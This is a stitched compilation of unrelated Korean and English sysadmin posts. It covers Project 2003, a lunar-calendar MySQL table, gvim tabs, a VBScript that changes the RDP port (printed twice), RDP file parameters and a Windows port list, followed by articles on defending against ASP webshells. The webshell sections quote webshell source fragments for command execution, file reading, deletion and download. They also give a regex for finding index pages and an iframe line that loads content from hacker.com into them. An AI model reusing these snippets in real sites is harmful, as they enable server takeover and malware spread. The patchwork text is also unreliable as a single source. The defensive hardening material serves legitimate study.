이런 웹 접근 모드는 프로젝트 2003의 적용을 확대하는데, 이동이 많은 사용자들은 서버에 간단한 작업 일지와 일정표를 둔 아웃룩 웹 클라이언트와 같은 방식으로 사용할 수 있다.

프로젝트 2003은 지난 10월 미국 LA에서 열린 프로페셔널 개발자 컨퍼런스에서 시연됐던 마이크로소프트 롱혼 기술과 같은 맥락에서 봐야 한다. 몇 가지 엉켜 있는 새로운 사용자 인터페이스 밑으로, 롱혼은 분리돼 있는 정보 저장소들을 훨씬 편리하게 통합해 주는 매개체가 되고 있다.

닷넷 기반, 서버 플랫폼으로 설계된 프로젝트 2003은 사용자들에게 리소스 할당 충돌과, 프로젝트에 대한 또다른 위험들을 규정할 수 있는 풍부한 기회를 제공한다. 이것이 기업 고객들이 오피스 스위트에 프로젝트 2003을 추가함으로써 얻는 부가가치다.

지원 OS : MYSQL DB가 구동되는 모든 OS

개발환경 : MYSQL 5.0

사용제한 : 프리웨어

제작자 :
진짜만세력 델파이 버전 : 고영창님 (kohyc@chol.com)
진짜만세력 MYSQL 버전 : 이양규님 <pro@trueweb.cc>
진짜만세력 MYSQL 버전에 대한민국 공유일 정보 추가 : 김성일(newrezn@naver.com)

자료설명 :

PHPSCHOOL - DOWNLOAD 게시판의 669번 자료글(양력음력변환 DB)에서 다운받은 자료에 우리나라 공휴일 정보를 추가한 것입니다.

검색 가능 기간은 양력 기준으로 1900년 01월 01일부터 2200년 12월 31일까지입니다.

공휴일은 위키백과의 '대한민국의 공휴일'을 참조하여 제정일자로부터 해당 공휴일이 나타나도록 하였고, 폐정일자 이후부터는 나오지 않도록 하였습니다. 각 공휴일의 연휴여부도 적용하였습니다.


필드는 다음과 같이 구성되어 있습니다.
num : 등록순번
lunar_date : 음력일자 (0000-00-00 형식)
solar_date : 양력일자 (0000-00-00 형식)
yun : 윤달여부 (0 : 평달, 1 :윤달)
ganji : 간지
memo : 공휴일


압축파일에는 3개 버전 그누보드용 테이블이 들어 있습니다.

MySQL 4.xxx euc-kr용 : g4_lunartosolar_mysql4.sql
MySQL 5.xxx euc-kr용 : g4_lunartosolar_mysql5ansi.sql
MySQL 5.xxx utf-8용 : g4_lunartosolar_mysql5utf8.sql

MYSQL 버전과 DB언어셋에 맞추어 사용하시면 됩니다.                    
                  

참조 : http://vim.wikia.com/wiki/Launch_files_in_new_tabs_under_Windows

윈도우용 vim 인 gvim.exe 편집기를 사용할 때
파일 열면 새창으로 열리지 않고
하나의 창에서 새탭으로 열리게 하는 팁입니다.
..
윈도우 7 의 경우
레지스트리 편집기를 열여서 ( regedit 명령어 )

\HKEY_CLASSES_ROOT\Applications\gvim.exe\shell\edit\command

항목을 열어서 "기본값" 수정에서

"C:\Program Files (x86)\Vim\vim73\gvim.exe" "%1"

와 같이 된 부분을 --remote-tab-silent 옵션을 추가해서
아래아 같이 수정하고 저장하면 됩니다.

"C:\Program Files (x86)\Vim\vim73\gvim.exe" --remote-tab-silent "%1"


===============
vim -p a.txt b.txt c.txt 하면 탭으로 열립니다.
vim -p3 하면 이름없는 파일로 탭 3개가 열립니다.

연상태에서

:tabnew d.txt 하면 새탭으로 파일을 열고..

:tabn 은 앞쪽으로 탭창이동 :tabp 뒤탭으로 이동
:tabfirst 혹은 :tabfir 는 첫번째 탭창, :tablast 혹은 :tabla 는 마지막 탭창          

단추키로는 normal에서 gt, gT 키로 탭이동도 됩니다.                             

보안 때문에 Win 서버나 개인 PC 터미널 포트를 기본 포트 외에 다른걸로 셋팅해서 사용하는데
매번 레지스트리 수정하는게 귀찮고 번거로워서 만들어 봤습니다.




터미널 포트 변경.vbs
========
MsgBox("터미널 포트 설정을 진행합니다. 저작권 : forioso@naver.com ")
Port = inputBox("몇번포트를 사용하시겠습니까?")
msg = MsgBox("터미널 포트를 " & Port & "로 변경합니다. 진행하시겠습니까?",vbYesNo , "터미널포트변경")

If msg = vbYes Then
Set wshShell = CreateObject("Wscript.Shell")
'regPort = wshShell.RegRead("HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber")

wshShell.RegWrite "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber", Port , "REG_DWORD"
wshShell.RegWrite "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber", Port , "REG_DWORD"
'wshShell = Nothing
MsgBox("변경 되었습니다.")
else
MsgBox("취소 되었습니다.")
end if                                       

보안 때문에 Win 서버나 개인 PC 터미널 포트를 기본 포트 외에 다른걸로 셋팅해서 사용하는데
매번 레지스트리 수정하는게 귀찮고 번거로워서 만들어 봤습니다.




터미널 포트 변경.vbs
========
MsgBox("터미널 포트 설정을 진행합니다. 저작권 : forioso@naver.com ")
Port = inputBox("몇번포트를 사용하시겠습니까?")
msg = MsgBox("터미널 포트를 " & Port & "로 변경합니다. 진행하시겠습니까?",vbYesNo , "터미널포트변경")

If msg = vbYes Then
Set wshShell = CreateObject("Wscript.Shell")
'regPort = wshShell.RegRead("HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber")

wshShell.RegWrite "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber", Port , "REG_DWORD"
wshShell.RegWrite "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber", Port , "REG_DWORD"
'wshShell = Nothing
MsgBox("변경 되었습니다.")
else
MsgBox("취소 되었습니다.")
end if                                       

제가 convert(varchar(혹은 char),regdate,112)='20110303' 같은 방식으로 날짜를 비교해서 처리하는 경우가 많았습니다.
group by를 쓸 때도 마찬가지구요.
근데 별로 느릴 거 같지 않은 쿼리가 느리기에
혹시나 하고 year(regdate)+right('0'+month(regdate),2) 이런 식으로 바꿨더니
속도가 확~ 빨라지네요.
9~11초 걸리던 쿼리가 1초로 바뀌네요.

RDP File Settings

The new Terminal Services client (version 2600 and newer, 5.1.2600.x) introduces quite a few new capabilities.  A major client-side convenience is that connection settings can be saved in an RDP file which can then be easily edited, copied, and distributed.

Unfortunately, the parameters are not nearly as well documented as the ActiveX control parameters yet; this will presumably change before the .NET server release.

In the interim, I've put together a summary of information I have about the parameters contained in the files.

Which Terminal Services/Remote Desktop Client?

The newest ones, versions 5.1.2600.x and up.  The client can be downloaded from the Remote Desktop Connection page - and despite the header, it is the client to use for connecting to either Terminal Services or XP Remote Desktop.

You can install it on any true 32-bit Windows OS except Windows XP and .NET - they already come with their own version.

Making an RDP File

You can create an RDP connection file using a text editor; there is nothing special about its structure to prevent this; in fact, the Terminal Services people appear to have been assiduous about making it simple and easy to use; the order in which parameters are placed doesn't even matter.

The simplest way to do it initially, though, is to run the mstsc client, configure basic settings you want, then choose "Save As..." on the General tab.  You can then open the resulting file in Notepad and work with it.

RDP File Structure

The file structure is relatively simple. The standard file consists of several lines; each has parameter name, type, and value, separated by a ":".  Any colons after the second one appear to be ignored (necessary so that file paths can be embedded).  MSTSC also appears to silently ignore anything it cannot parse, so you can insert freeform comments into the file.

For example, here are two lines which tell MSTSC to establish a 1024x768 desktop when it connects:

desktopheight:i:768
desktopwidth:i:1024

The first element in each line is the parameter name.  Immediately following it, after the first colon, is the parameter type; as far as I can tell, there are only 3 types of values -

i (integer) This is used for numeric values such as the desktop resolutions above.  All  of the "on-off" values are integers; this may be to allow future expansion of value types, since some - such as audio redirection and keyboard hooking - actually have multiple values.

s (string) Almost everything which is not a pure integer.  This includes paths and server names

b (binary) apparently only used for hashed password storage

RDP File Parameters

Below is a table listing all of the parameters I have encountered so far.  I list the parameter name, type, an example value, and then include notes on usage where possible.

Parameter		Value	Notes
alternate shell	s	c:\winnt\system32\notepad.exe	Sets the shell to be used within the Terminal Services session. This can be used to set an alternate shell such as progman.exe; you can also use it to set the application which the user runs on logon to the Terminal Server.
audiomode	i	2	Known values: 0 - Bring to this computer 1 - Leave at remote computer 2 - Do not play
auto connect	i	0	0 or 1
autoreconnection enabled	i	1	Set to 1 to connect automatically when file is opened.
bitmapcachepersistenable	i	1	? 1 maintains bitmap cache between sessions
compression	i	1	? 1 means use extra compressions
connect to console	i	1	0 - connect to a virtual session 1 - connect to the console session
desktopheight	i	768	height of session desktop in pixels
desktopwidth	i		width of session desktop in pixels
disable cursor setting	i	0	?
disable full window drag	i	1	set to 1, disables display of window contents while dragging in session
disable menu anims	i	1	set to 1, disables menu animations in session
disable themes	i	1	set to 1, disables use of themes in session
disable wallpaper	i	1	set to 1, disables display of wallpaper in session
displayconnectionbar	i	1	Set to 1, displays the connection bar in a fullscreen session
domain	s	HQ	domain name to use for logon
full address	s	192.168.1.1:33389	IP address/name of server (and optional alternate port)
keyboardhook	i	2	For applying standard Windows key combinations 0 - On the local computer 1 - On the remote computer 2 - In fullscreen mode only
maximizeshell	i	0	set to 1, maximizes any alternate shell used in the session
password 51	b	(big long binary hash)	Ifyou choose to save the connection password, this will be a large binary hash value
port	i	3389
redirectcomports	i	1	set to 1, redirects client COM ports in session (XP/.NET only)
redirectdrives	i	1	set to 1, redirects client drives in session (XP/.NET only)
redirectprinters	i	1	set to 1, redirects client printers in session
redirectsmartcards	i	1	set to 1, redirects client smart cards in session (XP/.NET only)
screen mode id	i	1	FullScreen vs. normal 0 - ? 1 - windowed 2 - fullscreen
server port	i	3389	You can specify the port separately from the "full address" parameter.  Thanks to James from acmewidgets.com for finding this out!
session bpp	i	16	bit depth for session - 8, 16, or 24. Only 8 is valid for Windows 2000 Terminal Servers
shell working directory	s	c:\program files\microsoft office	Working directory if an alternate shell was specified.
smart sizing	i		Scale the client window display of desktop when resizing 0 or not present - Do not scale 1 - Scale (Takes extra resources to scale)
username	s	administrator	name of user logging on
winposstr	s	0,1,0,249,808,876	? Not sure about the details on this one.  There are always 6 comma-separated values.  I would guess that these are presets for position and "window mode" sizes - maximized versus sized.

An Example RDP File

This is an example RDP connection file. It starts maximized for its desktop size (800x600); color depth is 16-bit; it will attempt to automatically start connecting to 192.168.1.12 on launch; and so on...

screen mode id:i:1
desktopwidth:i:800
desktopheight:i:600
session bpp:i:16
auto connect:i:1
full address:s:192.168.1.12
compression:i:1
keyboardhook:i:2
audiomode:i:2
redirectdrives:i:0
redirectprinters:i:0
redirectcomports:i:0
redirectsmartcards:i:0
displayconnectionbar:i:1
username:s:Administrator
domain:s:AKA
alternate shell:s:
shell working directory:s:
disable wallpaper:i:1
disable full window drag:i:1
disable menu anims:i:1
disable themes:i:1
bitmapcachepersistenable:i:1

터미널 서비스의 접근 제어를 위해 포트 번호를 변경하고 변경된 포트로 접속하는 방법에 대해서 알아보자.

서버에 설치된 터미널 서비스의 포트를 변경하려면

• 시작 - 실행을 눌러 레지스트리 편집기를 실행한다.
• HKEY_LOCAL_MACHINE\System\CurrentControlSet
  \Control\TerminalServer\Wds\Repwd\Tds\Tcp 로 이동한다.
• 이름 종류 데이터
• PortNumber REG_DWORD 0x00000d3d(3389)
• 10진수를 선택하고 원하는 다른 포트번호(6666)를 입력한다.
• HKEY_LOCAL_MACHINE\System\CurrentControlSet
  \Control\TerminalServer\WinStations\RDP-Tcp 로 이동한다.
• 이름 종류 데이터
• PortNumber REG_DWORD 0x00000d3d(3389)
• 10진수를 선택하고 원하는 다른 포트번호(6666)를 입력를 입력한다.
• 클라이언트 연결 관리자로 새 연결을 만들때 기입한 단어가 연결 이름이 된다.

터미널 접속 클라이언트 포트를 변경하려면

• 클라이언트 연결 관리자를 연다.
• 파일 메뉴에서 새연결을 클릭한다.
• 클라이언트 연결 관리자 마법사 시작창이 뜬다.
• 새 연결을 만들면 연결 관리자 목록에 아이콘이 하나 생성되어 있다.
• 새 연결을 이용해서 만든 아이콘을 클릭한후 파일 메뉴에서 내보내기를 누른다.
• 예로 "name" 이름을 지정하면 name.cns파일이 생성된다.
• name이 연결을 위해 사용하는 이름이다.
• name.cns 파일을 메모장으로 열고 편집을 Server Port=3389 에서 Server Port=6666 로 수정한다.
• 6666 이 터미널 서버에서 레지스트리 변경을 해서 새로 지정한 포트의 번호이다.
• 이제는 클라이언트 연결 관리자를 이용해서 변경한 name.cns파일을 가져오기를 한다.
• 클라이언트 연결도 관리자가 터미널 서버 세팅에서 변경한 포트와 같게 세팅된다.

ASP 트로이잔 Webshell의 예방 및 문제해결방법
 

Source from：[S.S.R.E.T]ServersTeam.Org [F.N.S.T]Fineacer.Org
url：http://www.Serversteam.org/docs/Microsoft_Win_ASP_Webshell_Security.htm

개요：본문에서는 Microsoft 윈도우 계열의SERVER (IIS5.0、IIS6.0)에서 간단하고 빠르게 ASP 위험성 있는 컨포넌트를 WEB서버 시스템으로부터 멀리하는 것을 설명한다. 본문을 읽는 후 자기가 관리하고 있는 서버를 asp 트로이잔, Webshell 권한상승 및 시스템 보안위협 등으로부터 벗어날 수 있다.

본문：
주의：본문에서 언급된 설정방법 및 설정환경은：Microsoft Windows 2000 Server/Win2003 SERVER | IIS5.0/IIS6.0에 적용함.

1、우선 일반적인ASP트로이잔을 살펴본다, Webshell에서 사용한 ASP 컨포넌트는 아래와 같다. 중국산 webshell인 HY2006를 예를 들어보면,

<object runat="server" id="ws" scope="page" classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat="server" id="ws" scope="page" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<object runat="server" id="net" scope="page" classid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"></object>
<object runat="server" id="net" scope="page" classid="clsid:F935DC26-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<object runat="server" id="fso" scope="page" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
shellStr="Shell"
applicationStr="Application"
if cmdPath="wscriptShell"
set sa=server.createObject(shellStr&"."&applicationStr)
set streamT=server.createObject("adodb.stream")
set domainObject = GetObject("WinNT://.")

이상은 HaiYang webshell의 일부 소스다, webshell에서는 아래 여러 종류의 ASP컨포넌트를 사용하고 있는 것을 알 수 있다.
① WScript.Shell (classid:72C24DD5-D70A-438B-8A42-98424B88AFB8)
② WScript.Shell.1 (classid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B)
③ WScript.Network (classid:093FF999-1EA0-4079-9525-9614C3504B74)
④ WScript.Network.1 (classid:093FF999-1EA0-4079-9525-9614C3504B74)
⑤ FileSystem Object (classid:0D43FE01-F093-11CF-8940-00A0C9054228)
⑥ Adodb.stream (classid:{00000566-0000-0010-8000-00AA006D2EA4})
⑦ Shell.applicaiton....

2: 해결방법：

① 아래 위험성 있는 ASP 컨포넌트를 삭제 혹은 명칭을 변경한다.
WScript.Shell、WScript.Shell.1、Wscript.Network、Wscript.Network.1、adodb.stream、Shell.application
[시작->실행->Regedit]을 실행하여 레지스토리를 수정한다. “Ctrl+F”으로 찾기를 실행한다. 순서대로 위에 Wscript.Shell등 컨포넌트의 명칭 혹은 그와 매칭한 ClassID을 입력한다. 해당 명칭을 삭제하거나 변경한다. (여기서 명칭변경을 권장한다. 만약 일부 웹 페이지의ASP프로그램에서 위에 열거한 컨포넌트를 사용했다면, ASP코드작성시 수정된 컨포넌트의 명칭을 사용하면 모든 것이 정상적 사용을 가능하다. 만약 ASP프로그램에서 이상의 컨포넌트를 사용하지 않는다면 삭제하는 것이 좋다. 삭제 혹은 명칭 변경 후, iisreset으로 IIS재 동작 후 적용한다.)
[주의：Adodb.Stream 컨포넌트는 많은 사이트에서 사용하기 때문에  만약 서버가 Virtual machine 이면 상황에 따라 조치 바람.]

② File System Object (classid:0D43FE01-F093-11CF-8940-00A0C9054228) 보안 문제에 대해 만약 서버에서 FSO를 사용해야 한다면(일부 Virtual Machine에서는 FSO기능을 사용함), FSO보안 해결방법은 “Microsoft Windows 2000 Server FSO 安全隐患解决办法” 문서를 참고하시길 바란다. 사용할 필요 없는 경우 직접 사용중지 하면 된다.

③ 사용중지 혹은 위험성 있는 컨포넌트를 삭제하는 방법：(방법① 및 방법②를 번거롭다고 생각하는 분은 본 방법을 참고함.)

wscript.shell 오브젝트를 해제하는 방법은 아래와 같다. cmd 모드에서[：regsvr32 /u %windir%\system32\WSHom.Ocx]를 실행한다.
FSO 오브젝트를 cmd 에서 아래 내용을 실행하여 해제한다. [regsvr32.exe /u %windir%\system32\scrrun.dll]
stream 오브젝트의 해제는 cmd에서 [regsvr32 /s /u "C:\Program Files\Common Files\System\ado\msado15.dll" ]를 실행한다.
만약 실행취소를 원한다면 위에 명령에 [/U] 옵션만 제거하면 된다. 즉, 관련 ASP컨포넌트를 재실행 가능하다. 예를 들면, regsvr32.exe %windir%\system32\scrrun.dll

④ Webshell 중에 set domainObject = GetObject("WinNT://.")을 사용하여 서버 프로세스, 서비스 및 사용자 정보 등을 획득하는 것에 대한 예방 방법은 아래와 같다. 서비스 중의 Workstation[네트워크 연결 및 통신을 제공함] 즉, Lanmanworkstation서비스를 중지하면 문제해결 된다. 이렇게 처리하면 Webshell 프로세스를 디스플레이 하는 곳에 공백으로 표시된다.

3 위에 방법1、2에 따라 ASP관련 위험한 컨포넌트에 대해 처리 후, Ajiang asp probe으로 테스트하면,"서버CPU상세내역" 및 "서버운영체제"를 찾을 수 없으며 내용은 모두 공백으로 디스플레이 된다. HaiYang을 사용하여 Wscript.Shell를 테스트 하면, cmd commend line에서 Active를 만들 수 없다는 메시지가 디스플레이 된다. ASP 트로이잔이 서버 시스템에 대한 보안 위협을 완화할 수 있다.
본문에서 소개한 내용은 단지 본인이 ASP트로이잔、Webshell에 대한 소견뿐이다. 향후 여러분께 어떻게 간단하게 타인 컴퓨터에 net user 와 같은 명령의 실행을 방지하고, 버퍼 오버플로우를 통해 cmdshell 획득을 방지 및 사용자 추가의 방지, NTFS 설정권한에서 터미널 서비스 등록 등에 대한 간단하고도 효과적인 방어방법을 소개할 예정이다.


저자： 李泊林/LeeBolin
[S.S.R.E.T 服务器安全研究专家小组 CTO] Http://www.serversteam.org
[F.N.S.T 情长计算机网络安全在线 技术顾问] Http://www.fineacer.org
E-mail:leebolin#serversteam.org QQ:24460394 본문관련 질문 사항은 메일 혹은 QQ에 연락하시길 바람 

윈도우에서 구동되는 포트번호로 구분된 네트워크 서비스와 윈도우 서비스로 관련 윈도우 서비스를 제어판에서 중지시킨다면 관련 포트번호를 차단할 수 있다. 임시방편으론 "%SystemRoot%system32driversetc" services파일에 주석처리로 해당 포트를 disable시킬 수 있다. 포트 Protocol 네트워크 서비스 관련 윈도우 서비스 서비스명 7 TCP Echo Simple TCP/IP Services SimpTcp 7 UDP Echo Simple TCP/IP Services SimpTcp 9 TCP Discard Simple TCP/IP Services SimpTcp 9 UDP Discard Simple TCP/IP Services SimpTcp 13 TCP Daytime Simple TCP/IP Services SimpTcp 13 UDP Daytime Simple TCP/IP Services SimpTcp 17 TCP Quotd Simple TCP/IP Services SimpTcp 17 UDP Quotd Simple TCP/IP Services SimpTcp 19 TCP Chargen Simple TCP/IP Services SimpTcp 19 UDP Chargen Simple TCP/IP Services SimpTcp 20 TCP FTP default data FTP Publishing Service MSFtpsvc 21 TCP FTP control FTP Publishing Service MSFtpsvc 21 TCP FTP control Application Layer Gateway Service ALG 23 TCP Telnet Telnet TlntSvr 25 TCP SMTP Simple Mail Transport Protocol SMTPSVC 25 UDP SMTP Simple Mail Transport Protocol SMTPSVC 25 TCP SMTP Exchange Server 　 25 UDP SMTP Exchange Server 　 42 TCP WINS Replication Windows Internet Name Service WINS 42 UDP WINS Replication Windows Internet Name Service WINS 53 TCP DNS DNS Server DNS 53 UDP DNS DNS Server DNS 53 TCP DNS Internet Connection Firewall/Internet Connection Sharing SharedAccess 53 UDP DNS Internet Connection Firewall/Internet Connection Sharing SharedAccess 67 UDP DHCP Server DHCP Server DHCPServer 67 UDP DHCP Server Internet Connection Firewall/Internet Connection Sharing SharedAccess 69 UDP TFTP Trivial FTP Daemon Service tftpd 80 TCP HTTP Windows Media Services WMServer 80 TCP HTTP World Wide Web Publishing Service W3SVC 80 TCP HTTP SharePoint Portal Server 　 88 TCP Kerberos Kerberos Key Distribution Center Kdc 88 UDP Kerberos Kerberos Key Distribution Center Kdc 102 TCP X.400 Microsoft Exchange MTA Stacks 　 110 TCP POP3 Microsoft POP3 Service POP3SVC 110 TCP POP3 Exchange Server 　 119 TCP NNTP Network News Transfer Protocol NntpSvc 123 UDP NTP Windows Time W32Time 123 UDP SNTP Windows Time W32Time 135 TCP RPC Message Queuing msmq 135 TCP RPC Remote Procedure Call RpcSs 135 TCP RPC Exchange Server 　 137 TCP NetBIOS Name Resolution Computer Browser Browser 137 UDP NetBIOS Name Resolution Computer Browser Browser 137 TCP NetBIOS Name Resolution Server lanmanserver 137 UDP NetBIOS Name Resolution Server lanmanserver 137 TCP NetBIOS Name Resolution Windows Internet Name Service WINS 137 UDP NetBIOS Name Resolution Windows Internet Name Service WINS 137 TCP NetBIOS Name Resolution Net Logon Netlogon 137 UDP NetBIOS Name Resolution Net Logon Netlogon 137 TCP NetBIOS Name Resolution Systems Management Server 2.0 　 137 UDP NetBIOS Name Resolution Systems Management Server 2.0 　 138 UDP NetBIOS Datagram Service Computer Browser Browser 138 UDP NetBIOS Datagram Service Messenger Messenger 138 UDP NetBIOS Datagram Service Server lanmanserver 138 UDP NetBIOS Datagram Service Net Logon Netlogon 138 UDP NetBIOS Datagram Service Distributed File System Dfs 138 UDP NetBIOS Datagram Service Systems Management Server 2.0 　 138 UDP NetBIOS Datagram Service License Logging Service LicenseService 139 TCP NetBIOS Session Service Computer Browser Browser 139 TCP NetBIOS Session Service Fax Service Fax 139 TCP NetBIOS Session Service Performance Logs and Alerts SysmonLog 139 TCP NetBIOS Session Service Print Spooler Spooler 139 TCP NetBIOS Session Service Server lanmanserver 139 TCP NetBIOS Session Service Net Logon Netlogon 139 TCP NetBIOS Session Service Remote Procedure Call Locator RpcLocator 139 TCP NetBIOS Session Service Distributed File System Dfs 139 TCP NetBIOS Session Service Systems Management Server 2.0 　 139 TCP NetBIOS Session Service License Logging Service LicenseService 143 TCP IMAP Exchange Server 　 161 UDP SNMP SNMP Service SNMP 162 UDP SNMP Traps Outbound SNMP Trap Service SNMPTRAP 270 TCP MOM 2004 Microsoft Operations Manager 2004 MOM 389 TCP LDAP Server Local Security Authority LSASS 389 UDP LDAP Server Local Security Authority LSASS 389 TCP LDAP Server Distributed File System Dfs 389 UDP LDAP Server Distributed File System Dfs 443 TCP HTTPS HTTP SSL HTTPFilter 443 TCP HTTPS World Wide Web Publishing Service W3SVC 443 TCP HTTPS SharePoint Portal Server 　 445 TCP SMB Fax Service Fax 445 UDP SMB Fax Service Fax 445 TCP SMB License Logging Service LicenseService 445 UDP SMB License Logging Service LicenseService 445 TCP SMB Print Spooler Spooler 445 UDP SMB Print Spooler Spooler 445 TCP SMB Server lanmanserver 445 UDP SMB Server lanmanserver 445 TCP SMB Remote Procedure Call Locator RpcLocator 445 UDP SMB Remote Procedure Call Locator RpcLocator 445 TCP SMB Distributed File System Dfs 445 UDP SMB Distributed File System Dfs 445 TCP SMB Net Logon Dfs 445 UDP SMB Net Logon Dfs 500 UDP IPSec ISAKMP IPSec Services PolicyAgent 515 TCP LPD TCP/IP Print Server LPDSVC 548 TCP File Server for Macintosh File Server for Macintosh MacFile 554 TCP RTSP Windows Media Services WMServer 563 TCP NNTP over SSL Network News Transfer Protocol NntpSvc 593 TCP RPC over HTTP Remote Procedure Call RpcSs 593 TCP RPC over HTTP Exchange Server 　 636 TCP LDAP SSL Local Security Authority LSASS 636 UDP LDAP SSL Local Security Authority LSASS 993 TCP IMAP over SSL Exchange Server 　 995 TCP POP3 over SSL Exchange Server 　 1270 TCP MOM-Encrypted Microsoft Operations Manager 2000 one point 1433 TCP SQL over TCP Microsoft SQL Server SQLSERVR 1433 TCP SQL over TCP MSSQL$UDDI SQLSERVR 1434 UDP SQL Probe Microsoft SQL Server SQLSERVR 1434 UDP SQL Probe MSSQL$UDDI SQLSERVR 1645 UDP Legacy RADIUS Internet Authentication Service IAS 1646 UDP Legacy RADIUS Internet Authentication Service IAS 1701 UDP L2TP Routing and Remote Access RemoteAccess 1723 TCP PPTP Routing and Remote Access RemoteAccess

 다음 관련 데이터 및 로그는 실제 Sql Injection 해킹된 서버에서, 해당 서브넷에서 Arp Spoofing 시도를 위한 일부 입니다. 이와 관련된 해킹 방어 대책은 인터넷에 수없이 공개되어 있으므로 참고만...^^

DDoS 공격사례, 기법 및 이를 위한 Arp Spoofing 등 기술문서
http://www.serverinfo.pe.kr/TipnTech.aspx?Seq=388

공개용 웹 방화벽 프로그램을 이용한 홈페이지 보안 - krcert
http://www.serverinfo.pe.kr/TipnTech.aspx?Seq=312

해킹, 악성코드등 보안 점검 자료 및 정보
http://www.serverinfo.pe.kr/TipnTech.aspx?Seq=310

Sql Injection 침해 흔적을 통한 보안점검
http://www.serverinfo.pe.kr/TipnTech.aspx?Seq=281

1. 개 요

가. 웹쉘이란?
웹쉘이란 공격자가 원격에서 대상 웹서버에 명령을 수행할 수 있도록 작성한 웹 스크립트 (asp, jsp, php, cgi) 파일이다. 이때 zip, jpg, doc와 같은 데이터 파일종류 이외에 악의적으로 제작된 스크립트 파일인 웹쉘을 업로드하여 웹 서버를 해킹하는 사고가 빈번히 발생하고 있다. 최근에는 파일 업로드뿐만 아니라 SQL Injection과 같은 웹 취약점을 공격한 후 지속적으로 피해시스템을 관리할 목적으로 웹쉘을 생성 한다.

공격자는 웹쉘을 대상 서버에 업로드한 후 웹을 이용하여 시스템 명령어를 수행하므로 네트워크 방화벽 영향을 받지 않고 서버를 제어할 수 있다. 웹쉘은 웹페이지 소스코드 열람, 악성스크립트 (iframe 등) 삽입, 파일 업로드, 서버 및 데이터베이스 자료 유출 등의 다양한 공격이 가능하다.
최근 웹쉘은 탐지를 어렵게 하기 위해 웹쉘의 일부분만을 피해시스템에 업로드 하는 등 그 유형이 나날이 발전하고 있다.

나. 웹쉘의 위험성
2007년도 인터넷침해사고대응지원센터(www.krcert.or.kr)에서 한 해 동안 분석했던 피해 웹서버 중 웹쉘이 발견된 웹서버는 총 91%의 분포를 보였다. 이것은 공격자들이 취약점을 공격 한 후 웹쉘을 업로드하여 시스템을 통제하기가 수월하다보니 사용 빈도가 높은 것을 확인할 수 있다.

웹 취약점을 통해 피해시스템에 접근한 공격자는 방화벽에서 접근을 허용하는 HTTP (80/tcp) 서비스를 통해 피해시스템을 제어 하므로 웹쉘을 차단하기가 쉽지 않다.

피해시스템에서 수집된 ASP 웹쉘 샘플 한 개를 http://www.virustotal.com 사이트에서 각 바이러스 백신 엔진 탐지결과를 확인하였다. 아래 그림과 같이 많은 국내외 백신사에서 탐지 못하고 있으며 공격자들은 스크립트 웹쉘들을 빈번히 변경시켜 사용하기 때문에 백신들로서는 탐지하기가 쉽지 않다.

Set WshShell = Server.CreateObject (“WScript.Shell”) Call WshShell.Run (cmd, 0, True) Set WshShell = CreateObject (“WScript.Shell”) Set oExec = WshShell.Exec (cmd)

시스템 명령어 또는 프로그램을 실행할 수 있는 또 다른 방법은 Shell.Application 오브젝트의
ShellExecute 메소드를 이용하는 것이다.

o Shell.Application
- Shellexecute“ Application”,“ Argument”,“ Path”,“ ”, 1

set objShell = CreateObject(“Shell.Application”) objShell.ShellExecute “notepad.exe”, “ ”, “ ”, “open”, 1

■ 파일 조작
파일관련 조작은 Scripting.FileSystemObject, Shell.Application, Adodb.Stream 오브젝트를 사용한다. 이 중에서 Scripting.FileSystemObject, Adodb.Stream 을 이용한 파일 조작 방법에 대해 살펴보도록 하겠다.

o Scripting.FileSystemObject
- 파일 리스팅

Set fso = CreateObject(“Scripting.FileSystemObject”) Set f = fso.GetFolder(folderpath) Set fp = f.Files For Each f1 in fp s = s & f1.name Next

- 파일 보기
fso는 Scripting.FileSystemObject로 생성한 오브젝트이다.

Set f = fso.OpenTextFile(“c:\testfile.txt”) ra = f.ReadAll

- 파일 생성 및 수정

Set MyFile = fso.CreateTextFile(“c:\testfile.txt”, True) MyFile.Write Contents

- 파일 이동 및 삭제

fso.CopyFile Path1, Path2 fso.CopyFolder Path1, Path2 fso.DeleteFile Path fso.DeleteFolder Path

■ 파일 다운로드
o Adodb.Stream

Set stream = Server.CreateObject”Adodb.Stream”) stream.Open stream.Type = 1 stream.LoadFromFile(Path) Response.AddHeader “Content-Disposition”, “attachment; filename=” & FileName Response.AddHeader “Content-Length”, stream.Size Response.Charset = “UTF-8” Response.ContentType = “application/octet-stream” Response.BinaryWrite stream.Read Response.Flush stream.Close Set stream = Nothing

■ 파일 업로드
Adodb.Stream 오브젝트를 이용하여 파일을 업로드 한다. 관련 메소드들은 아래와 같다.
※ 구현 예제 코드 생략
o Adodb.Stream
- Write
- Read
- SaveToFile

■ 웹페이지들에 악성스크립트 삽입 기능
웹쉘에서는 악성코드를 유포하기 위해 각 html 파일들이나 스크립트 파일에 악성 스크립트 (iframe)를 삽입하는 기능이 있다.

o 정규표현식으로 아래와 같이 악성스크립트를 삽입할 파일명을 정의한다. default, index main 등 홈페이지 메인페이지 이름을 갖는 html 파일들이나 스크립트 파일들을 정규표현 식으로 찾는다.
- (\\|\/)(default|index|main|admin)\.(htm|html|asp|php|jsp|aspx)\b

o 그리고 아래와 같은 iframe 악성 스크립트 코드를 삽입한다.
- <IFRAME height=0 src="http://hacker.com/m.htm" width=0></IFRAME>

